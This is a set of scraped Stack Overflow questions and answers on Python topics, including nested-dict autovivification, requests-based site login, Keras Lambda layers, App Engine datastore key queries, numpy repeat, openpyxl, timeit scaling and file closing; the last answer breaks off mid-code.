<p>Now I have this but in Python. <code>results</code> contains a collection of Sqlalchemy result objects</p>
<pre><code>from sqlalchemy import Column, create_engine, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
engine = create_engine('postgresql://stats:st@ts=Fun@localhost/ibl_stats')
Session = sessionmaker()
Session.configure(bind=engine)
session = Session()
class Game(Base):
__tablename__ = 'games'
id = Column(Integer, primary_key=True)
week = Column(Integer)
home_score = Column(Integer)
away_score = Column(Integer)
home_team_id = Column(Integer, ForeignKey('franchises.id'))
away_team_id = Column(Integer, ForeignKey('franchises.id'))
class Franchise(Base):
__tablename__ = 'franchises'
id = Column(Integer, primary_key=True)
nickname = Column(String(3))
name = Column(String(50))
conference = Column(String(10))
division = Column(String(10))
ip = Column(Integer)
# Loop through our standings building up the breakdown results
results = session.query(Game).all()
wins = dict()
losses = dict()
for result in results:
home_team = result.home_team_id
away_team = result.away_team_id
if result.home_score > result.away_score:
wins[home_team][away_team] += 1
losses[away_team][home_team] += 1
else:
wins[away_team][home_team] += 1
losses[home_team][away_team] += 1
</code></pre>
<p>So when I run this code I get the following error:</p>
<pre><code>(venv)vagrant@ibl:/vagrant/scripts$ python playoff_odds.py
Traceback (most recent call last):
File "playoff_odds.py", line 45, in <module>
wins[home_team][away_team] += 1
KeyError: 1
</code></pre>
<p>I did some searching before and it starts getting into the concept of "autovivification", which is something PHP does by default but Python does not.</p>
<p>So how do I duplicate the same behaviour in the Python code?</p>
| 2 | 2016-09-27T18:04:27Z | 39,731,744 | <p>This question has many interpretations. For example I would simulate results with the following dictionary:</p>
<pre><code>>>> result = {'Game':{'home_team':{'score':20,'id':1}, 'away_team':{'score':15,'id':2}}}
>>> print result['Game']
{'home_team': {'score': 20, 'id': 1}, 'away_team': {'score': 15, 'id': 2}}
>>> print result['Game']['home_team']
{'score': 20, 'id': 1}
>>> print result['Game']['away_team']['score']
15
</code></pre>
<p>There are a lot of ways to simulate your code, the above is just one of them. Of course the code doesn't do what the php code does, just shows a way to access the data.</p>
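<p>For completeness, here is one hedged sketch (the team ids and scores are made-up sample data, not from the question) that mirrors the PHP <code>isset</code> checks with plain dicts and <code>setdefault</code>, so the increments never hit a missing key:</p>

```python
# Sketch: port of the PHP isset/increment pattern using dict.setdefault.
# Sample results stand in for the database rows.
results = [
    {'home_team_id': 1, 'away_team_id': 2, 'home_score': 5, 'away_score': 3},
    {'home_team_id': 2, 'away_team_id': 1, 'home_score': 4, 'away_score': 6},
]

wins, losses = {}, {}
for r in results:
    home, away = r['home_team_id'], r['away_team_id']
    # mirror the four isset() checks: make sure both nested keys exist with 0
    for table in (wins, losses):
        table.setdefault(home, {}).setdefault(away, 0)
        table.setdefault(away, {}).setdefault(home, 0)
    if r['home_score'] > r['away_score']:
        wins[home][away] += 1
        losses[away][home] += 1
    else:
        wins[away][home] += 1
        losses[home][away] += 1

print(wins)  # {1: {2: 2}, 2: {1: 0}}
```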
| 1 | 2016-09-27T18:21:09Z | [
"python",
"dictionary"
]
|
Math operations on multi-dimensional Python dicts | 39,731,477 | <p>I am porting over some code from PHP that iterates through some database results and builds a two-dimensional array of wins and losses for teams in a baseball league. Here's the code in question in PHP</p>
<pre><code> foreach ($results as $result) {
$home_team = $result['Game']['home_team_id'];
$away_team = $result['Game']['away_team_id'];
if (!isset($wins[$home_team][$away_team])) $wins[$home_team][$away_team] = 0;
if (!isset($wins[$away_team][$home_team])) $wins[$away_team][$home_team] = 0;
if (!isset($losses[$home_team][$away_team])) $losses[$home_team][$away_team] = 0;
if (!isset($losses[$away_team][$home_team])) $losses[$away_team][$home_team] = 0;
if ($result['Game']['home_score'] > $result['Game']['away_score']) {
$wins[$home_team][$away_team]++;
$losses[$away_team][$home_team]++;
} else {
$wins[$away_team][$home_team]++;
$losses[$home_team][$away_team]++;
}
}
</code></pre>
<p><code>$results</code> is an array that contains the results of a database query</p>
<p>(Edited to add the Python code I have in progress)</p>
<p>Now I have this but in Python. <code>results</code> contains a collection of Sqlalchemy result objects</p>
<pre><code>from sqlalchemy import Column, create_engine, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
engine = create_engine('postgresql://stats:st@ts=Fun@localhost/ibl_stats')
Session = sessionmaker()
Session.configure(bind=engine)
session = Session()
class Game(Base):
__tablename__ = 'games'
id = Column(Integer, primary_key=True)
week = Column(Integer)
home_score = Column(Integer)
away_score = Column(Integer)
home_team_id = Column(Integer, ForeignKey('franchises.id'))
away_team_id = Column(Integer, ForeignKey('franchises.id'))
class Franchise(Base):
__tablename__ = 'franchises'
id = Column(Integer, primary_key=True)
nickname = Column(String(3))
name = Column(String(50))
conference = Column(String(10))
division = Column(String(10))
ip = Column(Integer)
# Loop through our standings building up the breakdown results
results = session.query(Game).all()
wins = dict()
losses = dict()
for result in results:
home_team = result.home_team_id
away_team = result.away_team_id
if result.home_score > result.away_score:
wins[home_team][away_team] += 1
losses[away_team][home_team] += 1
else:
wins[away_team][home_team] += 1
losses[home_team][away_team] += 1
</code></pre>
<p>So when I run this code I get the following error:</p>
<pre><code>(venv)vagrant@ibl:/vagrant/scripts$ python playoff_odds.py
Traceback (most recent call last):
File "playoff_odds.py", line 45, in <module>
wins[home_team][away_team] += 1
KeyError: 1
</code></pre>
<p>I did some searching before and it starts getting into the concept of "autovivification", which is something PHP does by default but Python does not.</p>
<p>So how do I duplicate the same behaviour in the Python code?</p>
| 2 | 2016-09-27T18:04:27Z | 39,733,881 | <p><a href="https://en.wikipedia.org/wiki/Autovivification#Python" rel="nofollow">Python's built-in dict class can be subclassed to implement autovivifying dictionaries simply by overriding the <code>__missing__()</code> method</a>, but that's only part of the solution. If you were to simply implement the <code>Tree</code> example in the Wikipedia link and do something like:</p>
<pre><code>wins = Tree()
wins['team_a']['team_b'] += 1
</code></pre>
<p>You'd run into: <code>TypeError: unsupported operand type(s) for +=: 'Tree' and 'int'</code> because <code>wins['team_a']['team_b']</code> will have automatically been typed <code>Tree</code> as well.</p>
<p>Whereas:</p>
<pre><code>wins = Tree()
wins['team_a']['team_b'] = 1
</code></pre>
<p>would assign the value 1 properly (as it's a reassignment, not an operation on an existing typed value).</p>
<p>The solution is to subclass to implement autovivification <em>and</em> to ensure that the leaf elements are integers that you can operate on. The following should solve this for you, or at least get you started:</p>
<pre><code>from collections import defaultdict
def autovivify(levels=1, final=dict):
return (defaultdict(final) if levels < 2
else defaultdict(lambda: autovivify(levels - 1, final)))
wins = autovivify(2, int)
losses = autovivify(2, int)
wins['team_a']['team_b'] += 1
losses['team_b']['team_a'] += 1
wins['team_b']['team_c'] += 1
losses['team_c']['team_b'] += 1
wins['team_a']['team_c'] += 1
losses['team_c']['team_a'] += 1
wins['team_a']['team_b'] += 1
losses['team_b']['team_a'] += 1
print(wins['team_a']) # outputs defaultdict(<type 'int'>, {'team_b': 2, 'team_c': 1})
</code></pre>
<p><strong>Source:</strong> <a href="http://blogs.fluidinfo.com/terry/2012/05/26/autovivification-in-python-nested-defaultdicts-with-a-specific-final-type/" rel="nofollow">http://blogs.fluidinfo.com/terry/2012/05/26/autovivification-in-python-nested-defaultdicts-with-a-specific-final-type/</a></p>
<p>The autovivify function will ensure that the first assignment (<code>team_a</code>) will give you another autovivifying tree, and the second (<code>team_b</code>) will give you an integer. From there, your <code>+= 1</code> will continue to increment the initial value of <code>0</code>.</p>
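<p>If the two-level case is all you need, a simpler alternative sketch (my own addition, a common idiom rather than part of the answer above) is a <code>defaultdict</code> of int-valued <code>defaultdict</code>s:</p>

```python
from collections import defaultdict

# Two-level autovivification: missing outer keys create an inner
# defaultdict(int), so += works immediately on any pair of keys.
wins = defaultdict(lambda: defaultdict(int))

wins['team_a']['team_b'] += 1
wins['team_a']['team_b'] += 1
wins['team_a']['team_c'] += 1

print(dict(wins['team_a']))  # {'team_b': 2, 'team_c': 1}
```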
| 2 | 2016-09-27T20:38:12Z | [
"python",
"dictionary"
]
|
How to Login to a Page Where Logins are Optional | 39,731,667 | <p>I'm trying to log in to a webpage; however, the problem--as far as I can tell--is that my username and password aren't getting passed by the <code>post</code> request. </p>
<p>So far I've tried: </p>
<pre><code>with requests.Session() as s:
p = s.post('http://www.marinetraffic.com/en/users/ajax_user_menu?', headers=user_agent1, data=payload)
r = s.get('http://www.marinetraffic.com/en/ais/index/port_moves/all/include_anchs:yes/ship_type:7/_:3525d580eade08cfdb72083b248185a9/in_transit:yes/time_interval:1474912018_1474998300/per_page:50/port:2341/portname:MUMBAI')
</code></pre>
<p>Where <code>user-agent</code> is my user agent, and <code>payload</code> are my valid login credentials. With both the <code>post</code> and <code>get</code> requests I get a <code>200</code> response, however the page I see is the same as if I hadn't logged in, i.e. the results aren't filtered the way the URL indicates they should be. </p>
<p>How do I make sure that I'm logged in?</p>
| 1 | 2016-09-27T18:16:15Z | 39,731,873 | <p><strong>try this:</strong></p>
<pre><code>payload={
'_method':'POST',
'email':your email,
'password':your passwd,
'is_ajax':True
}
p = s.post('http://www.marinetraffic.com/en/users/ajax_login', headers=user_agent1, data=payload)
</code></pre>
| -1 | 2016-09-27T18:28:21Z | [
"python",
"python-requests"
]
|
How to Login to a Page Where Logins are Optional | 39,731,667 | <p>I'm trying to log in to a webpage; however, the problem--as far as I can tell--is that my username and password aren't getting passed by the <code>post</code> request. </p>
<p>So far I've tried: </p>
<pre><code>with requests.Session() as s:
p = s.post('http://www.marinetraffic.com/en/users/ajax_user_menu?', headers=user_agent1, data=payload)
r = s.get('http://www.marinetraffic.com/en/ais/index/port_moves/all/include_anchs:yes/ship_type:7/_:3525d580eade08cfdb72083b248185a9/in_transit:yes/time_interval:1474912018_1474998300/per_page:50/port:2341/portname:MUMBAI')
</code></pre>
<p>Where <code>user-agent</code> is my user agent, and <code>payload</code> are my valid login credentials. With both the <code>post</code> and <code>get</code> requests I get a <code>200</code> response, however the page I see is the same as if I hadn't logged in, i.e. the results aren't filtered the way the URL indicates they should be. </p>
<p>How do I make sure that I'm logged in?</p>
| 1 | 2016-09-27T18:16:15Z | 39,732,053 | <p>It is actually completely the wrong url you posted, you need to post to <em><a href="https://www.marinetraffic.com/en/users/ajax_login" rel="nofollow">https://www.marinetraffic.com/en/users/ajax_login</a></em> and set the correct headers:</p>
<pre><code>data = [("_method", (None, "POST")), ("data[email]", (None, "you@mail.com")),
("data[password]", (None, "pass"))]
with requests.Session() as s:
s.headers.update({"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
"X-Requested-With": "XMLHttpRequest"})
p = s.post("https://www.marinetraffic.com/en/users/ajax_login", files=data)
print(p.content)
print(s.get("http://www.marinetraffic.com/en/ajax_user_settings/get_user_settings").json())
</code></pre>
<p>For the record this would also work:</p>
<pre><code>with requests.Session() as s:
data = dict(email="you@mail.com", password="pass", _method="POST")
s.headers.update({"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
"X-Requested-With": "XMLHttpRequest"})
p = s.post("https://www.marinetraffic.com/en/users/ajax_login", data=data)
print p.content
print(s.get("http://www.marinetraffic.com/en/ajax_user_settings/get_user_settings").json())
</code></pre>
| 1 | 2016-09-27T18:39:18Z | [
"python",
"python-requests"
]
|
Merge Variables in Keras | 39,731,669 | <p>I'm building a convolutional neural network with Keras and would like to add a single node with the standard deviation of my data before the last fully connected layer.</p>
<p>Here's a minimum code to reproduce the error:</p>
<pre><code>from keras.layers import merge, Input, Dense
from keras.layers import Convolution1D, Flatten
from keras import backend as K
input_img = Input(shape=(64, 4))
x = Convolution1D(48, 3, activation='relu', init='he_normal')(input_img)
x = Flatten()(x)
std = K.std(input_img, axis=1)
x = merge([x, std], mode='concat', concat_axis=1)
output = Dense(100, activation='softmax', init='he_normal')(x)
</code></pre>
<p>This results in the following <code>TypeError</code>:</p>
<pre><code>-----------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-117-c1289ebe610e> in <module>()
6 x = merge([x, std], mode='concat', concat_axis=1)
7
----> 8 output = Dense(100, activation='softmax', init='he_normal')(x)
/home/ubuntu/anaconda2/envs/tensorflow/lib/python2.7/site-packages/keras/engine/topology.pyc in __call__(self, x, mask)
486 '`layer.build(batch_input_shape)`')
487 if len(input_shapes) == 1:
--> 488 self.build(input_shapes[0])
489 else:
490 self.build(input_shapes)
/home/ubuntu/anaconda2/envs/tensorflow/lib/python2.7/site-packages/keras/layers/core.pyc in build(self, input_shape)
701
702 self.W = self.init((input_dim, self.output_dim),
--> 703 name='{}_W'.format(self.name))
704 if self.bias:
705 self.b = K.zeros((self.output_dim,),
/home/ubuntu/anaconda2/envs/tensorflow/lib/python2.7/site-packages/keras/initializations.pyc in he_normal(shape, name, dim_ordering)
64 '''
65 fan_in, fan_out = get_fans(shape, dim_ordering=dim_ordering)
---> 66 s = np.sqrt(2. / fan_in)
67 return normal(shape, s, name=name)
68
TypeError: unsupported operand type(s) for /: 'float' and 'NoneType'
</code></pre>
<p>Any idea why?</p>
| 3 | 2016-09-27T18:16:22Z | 39,750,977 | <p><code>std</code> is no Keras layer so it does not satisfy the layer input/output shape interface. The solution to this is to use a <a href="https://keras.io/layers/core/#lambda" rel="nofollow"><code>Lambda</code></a> layer wrapping <code>K.std</code>:</p>
<pre><code>from keras.layers import merge, Input, Dense, Lambda
from keras.layers import Convolution1D, Flatten
from keras import backend as K
input_img = Input(shape=(64, 4))
x = Convolution1D(48, 3, activation='relu', init='he_normal')(input_img)
x = Flatten()(x)
std = Lambda(lambda x: K.std(x, axis=1))(input_img)
x = merge([x, std], mode='concat', concat_axis=1)
output = Dense(100, activation='softmax', init='he_normal')(x)
</code></pre>
| 1 | 2016-09-28T14:51:45Z | [
"python",
"tensorflow",
"keras"
]
|
Id isn't returning anything in the Google App Engine datastore | 39,731,674 | <p>I tried select * from post which returns all posts. How can I do a select just for one post using the post_id? I've tried </p>
<pre><code>Select * from post where id='5629499534213120'
select * from post where post_id='5629499534213120'
select * from post where NAME/ID='5629499534213120'
</code></pre>
<p>and it didn't return anything. </p>
<p>Below is an image of my post table</p>
<p><a href="http://i.stack.imgur.com/5ZoFu.png" rel="nofollow"><img src="http://i.stack.imgur.com/5ZoFu.png" alt="Post Table"></a></p>
<p>Below is a detailed view.</p>
<p><a href="http://i.stack.imgur.com/ESmgz.png" rel="nofollow"><img src="http://i.stack.imgur.com/ESmgz.png" alt="detailed view"></a></p>
| 1 | 2016-09-27T18:16:36Z | 39,731,861 | <p>Generally speaking, you probably want to be doing a query with a key literal:</p>
<pre><code>SELECT * FROM Post WHERE __key__ = KEY('Post', 5629499534213120)
</code></pre>
<p>An additional thing to note -- Keys can have either string or integer ids. By default, the IDs are integers so I used an integer in the query above.</p>
| 3 | 2016-09-27T18:27:35Z | [
"python",
"google-app-engine",
"google-cloud-datastore"
]
|
Id isn't returning anything in the Google App Engine datastore | 39,731,674 | <p>I tried select * from post which returns all posts. How can I do a select just for one post using the post_id? I've tried </p>
<pre><code>Select * from post where id='5629499534213120'
select * from post where post_id='5629499534213120'
select * from post where NAME/ID='5629499534213120'
</code></pre>
<p>and it didn't return anything. </p>
<p>Below is an image of my post table</p>
<p><a href="http://i.stack.imgur.com/5ZoFu.png" rel="nofollow"><img src="http://i.stack.imgur.com/5ZoFu.png" alt="Post Table"></a></p>
<p>Below is a detailed view.</p>
<p><a href="http://i.stack.imgur.com/ESmgz.png" rel="nofollow"><img src="http://i.stack.imgur.com/ESmgz.png" alt="detailed view"></a></p>
| 1 | 2016-09-27T18:16:36Z | 39,732,516 | <p>Thanks I was able to get it working using</p>
<pre><code>SELECT * FROM Post WHERE __key__ = Key(blogs, 'default', Post, 5629499534213120)
</code></pre>
| 0 | 2016-09-27T19:08:21Z | [
"python",
"google-app-engine",
"google-cloud-datastore"
]
|
Replicating elements in numpy array | 39,731,771 | <p>I have a numpy array say</p>
<pre><code>a = array([[1, 2, 3],
[4, 5, 6],
[7, 8, 9]])
</code></pre>
<p>I have an array 'replication' of the same size where replication[i,j](>=0) denotes how many times a[i][j] should be repeated along the row. Obiviously, replication array follows the invariant that np.sum(replication[i]) have the same value for all i.
For example, if </p>
<pre><code>replication = array([[1, 2, 1],
[1, 1, 2],
[2, 1, 1]])
</code></pre>
<p>then the final array after replicating is:</p>
<pre><code>new_a = array([[1, 2, 2, 3],
[4, 5, 6, 6],
[7, 7, 8, 9]])
</code></pre>
<p>Presently, I am doing this to create new_a:</p>
<pre><code> ##allocate new_a
h = a.shape[0]
w = a.shape[1]
for row in range(h):
ll = [[a[row][j]]*replicate[row][j] for j in range(w)]
new_a[row] = np.array([item for sublist in ll for item in sublist])
</code></pre>
<p>However, this seems to be too slow as it involves using lists. Can I do the intended entirely in numpy, without the use of python lists?</p>
| 1 | 2016-09-27T18:22:55Z | 39,732,014 | <p>You can flatten out your <code>replication</code> array, then use the <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.repeat.html" rel="nofollow"><code>.repeat()</code></a> method of <code>a</code>:</p>
<pre><code>import numpy as np
a = np.array([[1, 2, 3],
              [4, 5, 6],
              [7, 8, 9]])
replication = np.array([[1, 2, 1],
                        [1, 1, 2],
                        [2, 1, 1]])
new_a = a.repeat(replication.ravel()).reshape(a.shape[0], -1)
print(repr(new_a))
# array([[1, 2, 2, 3],
# [4, 5, 6, 6],
# [7, 7, 8, 9]])
</code></pre>
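<p>As a small extension (my own sketch, not part of the original answer): <code>repeat()</code> also accepts zero counts, which drop elements entirely; the rows must still sum to the same total for the final reshape to succeed:</p>

```python
import numpy as np

# Zero counts remove elements; both rows here sum to 3, so reshape works.
a = np.array([[1, 2, 3],
              [4, 5, 6]])
replication = np.array([[0, 2, 1],
                        [1, 1, 1]])

new_a = a.repeat(replication.ravel()).reshape(a.shape[0], -1)
print(new_a)
# [[2 2 3]
#  [4 5 6]]
```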
| 3 | 2016-09-27T18:36:30Z | [
"python",
"arrays",
"numpy",
"replicate"
]
|
Scrapy - iterate over object | 39,731,804 | <p>this is how I'm running <code>scrapy</code> from a <code>Python</code> script:</p>
<pre><code>def iterate():
process = CrawlerProcess(get_project_settings())
tracks = process.crawl('pitchfork_tracks', domain='pitchfork.com')
process.start()
</code></pre>
<p>however, I can't seem to <code>iterate</code> through the <code>response</code>, which is a <code>dict</code> in this fashion:</p>
<pre><code>{'track': [u'\u201cAnxiety\u201d',
u'\u201cLockjaw\u201d [ft. Kodak Black]',
u'\u201cMelanin Drop\u201d',
u'\u201cDreams\u201d',
u'\u201cIntern\u201d',
u'\u201cYou Don\u2019t Think You Like People Like Me\u201d',
u'\u201cFirst Day Out tha Feds\u201d',
u'\u201cFemale Vampire\u201d',
u'\u201cGirlfriend\u201d',
u'\u201cOpposite House\u201d',
u'\u201cGirls @\u201d [ft. Chance the Rapper]',
u'\u201cI Am a Nightmare\u201d']}
</code></pre>
<p>how do I <code>iterate</code> through this <code>response</code>? To my knowledge, up to this point the response is an <code>object</code> and thus non-iterable.</p>
| 0 | 2016-09-27T18:24:34Z | 39,732,758 | <p>You should follow the workflow of the Scrapy framework: the Spider handles how requests are built and responses are parsed, and the ItemPipeline handles how items are processed.</p>
<p>From your code:</p>
<pre><code>tracks = process.crawl('pitchfork_tracks', domain='pitchfork.com')
</code></pre>
<p><code>pitchfork_tracks</code> is a spider name in your project, so you should handle iterating over the response in the spider itself, and do any further processing in an item pipeline. For the ItemPipeline part, you need to configure the settings manually when running Scrapy from a script. Check the docs for approaches to running Scrapy from a script: <a href="https://doc.scrapy.org/en/latest/topics/practices.html#run-scrapy-from-a-script" rel="nofollow">common practice - run from script</a></p>
<p>By the way, according to the docs for <a href="https://doc.scrapy.org/en/latest/topics/api.html#scrapy.crawler.CrawlerProcess" rel="nofollow">CrawlerProcess</a>,</p>
<p><code>tracks = process.crawl('pitchfork_tracks', domain='pitchfork.com')</code></p>
<p><code>tracks</code> is a Twisted <code>Deferred</code> object, and this object is not iterable. Unless you are familiar with Twisted and Scrapy internals, you'd better follow the work flow of the Scrapy framework.</p>
<p>Thanks.</p>
| 0 | 2016-09-27T19:24:45Z | [
"python",
"scrapy",
"iteration"
]
|
Python import error: 'Cannot import name' | 39,731,807 | <p>I'm having trouble importing a class from a Python module.</p>
<p>Here is my directory structure:</p>
<pre><code>_wikiSpider
+scrapy.cfg
_wikiSpider
+__init__.py
+items.py
+items.pyc
+settings.py
+settings.pyc
+pipelines.py
_spiders
+__init__.py
+__init__.pyc
+articleSpider.py
+articleSpider.pyc
+items.py
</code></pre>
<p>Code breaks at this line:</p>
<pre><code>from wikiSpider.items import Article
</code></pre>
<p>I'm not sure why, since the class Article is defined in items.py (the deepest folder)</p>
<p>Can someone give me an explanation?</p>
| 0 | 2016-09-27T18:24:50Z | 39,731,967 | <p>You have an items.py in both your root and _spiders folder. To reference a file in a subfolder you need the folder name and the file.</p>
<p><code>from _spiders.items import Article</code></p>
<p>assuming the file that imports this code is in your root directory. Python resolves imports relative to the current file's location in the directory hierarchy.</p>
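<p>A self-contained sketch of the underlying rule (the throwaway package name <code>spiders_demo</code> is made up for illustration): the import path must name the package folder that contains <code>items.py</code>:</p>

```python
import os
import sys
import tempfile
import textwrap

# Build a throwaway package on disk: spiders_demo/__init__.py + items.py,
# standing in for the _spiders folder from the question.
root = tempfile.mkdtemp()
pkg = os.path.join(root, 'spiders_demo')
os.makedirs(pkg)
open(os.path.join(pkg, '__init__.py'), 'w').close()
with open(os.path.join(pkg, 'items.py'), 'w') as f:
    f.write(textwrap.dedent('''
        class Article(object):
            pass
    '''))

sys.path.insert(0, root)            # make the root importable
from spiders_demo.items import Article  # folder name + module name

print(Article.__name__)  # Article
```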
| 1 | 2016-09-27T18:33:43Z | [
"python",
"import",
"scrapy"
]
|
Q: OpenPyxl checking for existing row and then updating cell | 39,731,903 | <p>I want to check for a name column in an existing spreadsheet and if it exists I want to update a specific column with a time stamp for that row. I'm in a rut because I can't figure out how to go about this without a for loop. The for loop will append more rows for the ones it didn't match, and nothing shows up in the column when I try to stamp it after matching a name with a row. </p>
<pre><code> for rowNum in range(2, ws1.max_row):
log_name = ws1.cell(row=rowNum,column=1).value
if log_name == chkout_new_name_text:
print 'apple' + 'pen'
ws1.cell(row=rowNum, column=2).value = str(time.strftime("%m/%d/%y %H:%M %p"))
break
else:
continue
print 'pen' + 'pineapple'
# Normal procedure
</code></pre>
<p>Any help will be greatly appreciated.</p>
| 0 | 2016-09-27T18:30:02Z | 39,798,105 | <p>Figured it out</p>
<pre><code> name_text = raw_input("Please enter name: ")
matching_row_nbr = None
for rowNum in range(2, ws1.max_row + 1 ):
log_name = ws1.cell(row=rowNum,column=1).value
if log_name == name_text:
# Checks for a matching row and remembers the row number
matching_row_nbr = rowNum
break
if matching_row_nbr is not None:
# Uses the matching row number to change the cell value of the specific row
ws1.cell(row=matching_row_nbr, column=6).value = str(time.strftime("%m/%d/%y %H:%M - %p"))
wb.save(filename = active_workbook)
else:
# If the none of the rows match then continue with intended use of new data
print name_text
</code></pre>
| 0 | 2016-09-30T18:42:12Z | [
"python",
"openpyxl"
]
|
python's `timeit` doesn't always scale linearly with number? | 39,732,027 | <p>I'm running Python 2.7.10 on a 16GB, 2.7GHz i5, OSX 10.11.5 machine. </p>
<p>I've observed this phenomenon many times in many different types of examples, so the example below, though a bit contrived, is representative. It's just what I happened to be working on earlier today when my curiosity was finally piqued. </p>
<pre><code>>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=100)
3.790855407714844e-05
>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=1000)
0.0003371238708496094
>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=10000)
0.014712810516357422
>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=100000)
0.029777050018310547
>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=1000000)
0.21139287948608398
</code></pre>
<p>You'll notice that, from 100 to 1000, there's a factor of 10 increase in the time, as expected. However, 1e3 to 1e4, it's more like a factor of 50, and then a factor of 2 from 1e4 to 1e5 (so a total factor of 100 from 1e3 to 1e5, which is expected). </p>
<p>I'd figured that there must be some sort of caching-based optimization going on either in the actual process being timed or in <code>timeit</code> itself, but I can't quite figure out empirically whether this is the case. The imports don't seem to matter, as can be observed with a most basic example:</p>
<pre><code>>>> timeit('1==1', number=10000)
0.0005490779876708984
>>> timeit('1==1', number=100000)
0.01579904556274414
>>> timeit('1==1', number=1000000)
0.04653501510620117
</code></pre>
<p>where from 1e4 to 1e6 there's a true factor of 1e2 time difference, but the intermediate steps are ~30 and ~3. </p>
<p>I could do more ad hoc data collection but I haven't got a hypothesis in mind at this point. </p>
<p>Any notion as to why the scaling is non-linear at certain intermediate numbers of runs?</p>
| 9 | 2016-09-27T18:37:25Z | 39,732,127 | <p>This has to do with a smaller number of runs not being accurate enough to get the timing resolution you want.</p>
<p>As you increase the number of runs, the ratio between the times approaches the ratio between the number of runs:</p>
<pre><code>>>> def timeit_ratio(a, b):
... return timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=a) / timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=b)
>>> for i in range(32):
... r = timeit_ratio(2**(i+1), 2**i)
... print 2**i, 2**(i+1), r, abs(r - 2)**2 # mean squared error
...
1 2 3.0 1.0
2 4 1.0 1.0
4 8 1.5 0.25
8 16 1.0 1.0
16 32 0.316455696203 2.83432142285
32 64 2.04 0.0016
64 128 1.97872340426 0.000452693526483
128 256 2.05681818182 0.00322830578512
256 512 1.93333333333 0.00444444444444
512 1024 2.01436781609 0.000206434139252
1024 2048 2.18793828892 0.0353208004422
2048 4096 1.98079658606 0.000368771106961
4096 8192 2.11812990721 0.0139546749772
8192 16384 2.15052027269 0.0226563524921
16384 32768 1.93783596324 0.00386436746641
32768 65536 2.28126901347 0.0791122579397
65536 131072 2.18880312306 0.0356466192769
131072 262144 1.8691643357 0.0171179710535
262144 524288 2.02883451562 0.000831429291038
524288 1048576 1.98259818317 0.000302823228866
1048576 2097152 2.088684654 0.00786496785554
2097152 4194304 2.02639479643 0.000696685278755
4194304 8388608 1.98014042724 0.000394402630024
8388608 16777216 1.98264956218 0.000301037692533
</code></pre>
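<p>A rough way to see this yourself (my own sketch; exact numbers will vary by machine): with large enough repetition counts the measured time tracks the amount of work, while tiny counts mostly measure timer resolution and noise:</p>

```python
from timeit import timeit

# 100x the repetitions should take measurably longer once both runs are
# large enough to dominate the timer's resolution.
t_small = timeit('1 == 1', number=10000)
t_large = timeit('1 == 1', number=1000000)

print(t_large > t_small)  # True on any idle machine
```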
| 8 | 2016-09-27T18:43:06Z | [
"python",
"performance",
"optimization",
"timeit"
]
|
Will file be closed after "open(file_name, 'w+').write(somestr)" | 39,732,042 | <p>I'm new to python.</p>
<p>I wonder if I write:</p>
<pre><code>open('/tmp/xxx.txt', 'w+').write('aabb')
</code></pre>
<p>Will the file be still opened or closed?</p>
<p>In another word, what's the difference between the above and</p>
<pre><code>with open('/tmp/xxx.txt', 'w+') as f:
f.write('aabb')
</code></pre>
| 1 | 2016-09-27T18:38:40Z | 39,732,059 | <p>The file might stay open.</p>
<p>Keep in mind that it <strong>will</strong> be automatically closed upon garbage collection or software termination but it's a bad practice to count on it as exceptions, frames or even delayed GC might keep it open.</p>
<p>Also, you might lose data if the program terminated unexpectedly and you don't <code>flush()</code> it.</p>
<hr>
<p>In other Python implementations, where the GC behaves differently (PyParallel, for example), it might cause a real problem.</p>
<p>Even in CPython, it might still stay open in case of frame reference for example. Try running this:</p>
<pre><code>import sys
glob_list = []
def func(*args, **kwargs):
glob_list.append((args, kwargs))
return func
sys.settrace(func)
open('/tmp/xxx.txt', 'w+').write('aabb')
</code></pre>
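<p>A quick sketch of the difference in practice (the temp path is illustrative): with the context-manager form the handle is guaranteed closed, and the write flushed, the moment the block exits:</p>

```python
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), 'xxx.txt')

with open(path, 'w+') as f:
    f.write('aabb')

print(f.closed)  # True: closed as soon as the with-block ended

with open(path) as g:  # reopen to show the data really reached disk
    data = g.read()
print(data)  # aabb
```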
| 1 | 2016-09-27T18:39:31Z | [
"python"
]
|
Calculating average and outputting number of cases which were more than and less than average from a list | 39,732,096 | <p>Task:
Write an algorithm to allow a user to input the maximum and minimum daily temperatures for a number of days until a maximum temperature of 999 is entered.</p>
<p>The program then calculates the average temperature and outputs the number of days that the temperature was above average. It also outputs the number of days that the temperature was negative.</p>
<p>My code that returns with a syntax error: <a href="http://imgur.com/ArMFAk3" rel="nofollow">http://imgur.com/ArMFAk3</a></p>
| -2 | 2016-09-27T18:41:32Z | 39,732,166 | <p><code>input</code> returns a string. To make it an integer do <code>int( input('Enter temperature: '))</code></p>
| 0 | 2016-09-27T18:45:52Z | [
"python"
]
|
Calculating average and outputting number of cases which were more than and less than average from a list | 39,732,096 | <p>Task:
Write an algorithm to allow a user to input the maximum and minimum daily temperatures for a number of days until a maximum temperature of 999 is entered.</p>
<p>The program then calculates the average temperature and outputs the number of days that the temperature was above average. It also outputs the number of days that the temperature was negative.</p>
<p>My code that returns with a syntax error: <a href="http://imgur.com/ArMFAk3" rel="nofollow">http://imgur.com/ArMFAk3</a></p>
| -2 | 2016-09-27T18:41:32Z | 39,732,286 | <p>Reading through the code in the image that you posted and assuming that your algorithm is correct, the following code does what you want (Python 2.7):</p>
<pre><code>import numpy as np
temperatures = []
total = 0
maxtemp = 999
while total < maxtemp:
data = input("What is your temperature: ")
temperatures.append(data)
total = total + data
temperatures = np.array(temperatures)
